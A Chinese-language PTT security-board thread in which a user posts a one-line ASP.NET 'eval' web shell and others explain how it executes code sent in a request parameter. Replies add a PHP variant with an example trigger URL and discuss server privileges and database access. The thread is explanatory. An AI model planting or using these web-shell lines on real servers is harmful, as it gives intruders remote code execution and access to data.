作者newnovice (serenity)
看板NetSecurity
标题[问题] 一句话木马
时间Fri May 24 20:13:28 2019
在网路上看到这个东东
<%@ Page Language="Jscript" validateRequest="false"
%><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
挺有趣的,有大神可以解释这一行作用吗,感谢。
--
※ 发信站: 批踢踢实业坊(ptt.cc), 来自: 118.171.78.143
※ 文章网址: https://webptt.com/cn.aspx?n=bbs/NetSecurity/M.1558700011.A.648.html
1F:推 st1009: 嗯,这句话真长... 05/24 21:05
2F:推 st1009: eval是个可以把接收到的字串转成code的函式,所以今天这个 05/24 21:06
3F:→ st1009: 程式收到一个Request,可能是get也可能是post吧,传来了一 05/24 21:06
4F:→ st1009: 个变数叫作w,而我们在这个w中可以放入程式码,然後他就会 05/24 21:07
5F:→ st1009: 执行,是说仔细看看,这样应该算是两句话... 05/24 21:08
6F:→ st1009: 真正一句话木马---> eval($_GET('shell')); 05/24 21:09
7F:→ st1009: 要执行时像是这样 foo.com/index.php?shell="echo 'atk';" 05/24 21:10
8F:→ st1009: 我打了好多字... 我可以转CyberSecure板嘛? 05/24 21:11
9F:推 CMJ0121: 一句话木马都可以写成半本书了 XD 05/24 22:07
10F:→ newnovice: 请教st大 所以这个w算是拿到os的root shell吗? 也能执 05/24 23:03
11F:→ newnovice: 行任何资料库的捞取? 05/24 23:03
12F:推 st1009: 嗯,没意见,应该是可以转,晚点转转 05/24 23:25
13F:→ st1009: 这个w有没有取得root权限要看被注入木马的档案本身的权限 05/24 23:26
14F:→ st1009: ,一般而言,普通的档案是不会有root权限的,如果操作正常 05/24 23:27
15F:→ st1009: ...我是有听说过有不少人没事就给PHPmyadmin root 然後被 05/24 23:27
16F:→ st1009: 人用这个REC时就Q了XDDD 05/24 23:27
17F:→ st1009: 以PHP为例,通常没有意外的话,一个PHP是可以捞取DB,如果 05/24 23:28
18F:→ st1009: 没有特别控管是可以执行任何资料库的捞取没错 05/24 23:29
19F:→ st1009: 不过专业点的会把DB分段,这时就只能捞有权限的那段了 05/24 23:30
※ st1009:转录至看板 CyberSecure 05/24 23:31
20F:推 st1009: 是说我有些用词没有很精确,不要太在意>"< 05/24 23:35
21F:推 asimon: 楼上怪怪的.. 该说执行木马者的执行权限吧? 05/26 03:36
22F:→ asimon: 虽然备注入木马的.php是ooxx:ooxx但如果apache是root执行, 05/26 03:37
23F:→ asimon: 还是会拿到root权限.. 同样的, 如果从mysql执行系统指令, 05/26 03:37
24F:→ asimon: 看的就是mysql的服务是谁启动的, 如果用appserv, 全部跑 05/26 03:37
25F:→ asimon: administrator当然就... ((请自行想像.. 05/26 03:38
26F:推 asimon: 然後楼上提到拿到一句话的权限是否能不能捞DB.. 05/26 03:40
27F:→ asimon: 如果DB另外有设密码, 就要另外破密码.. 05/26 03:40
28F:→ asimon: 回文好了.. 05/26 03:41
29F:推 st1009: 嗯,对啊,所以我说我说的不精确 05/26 10:19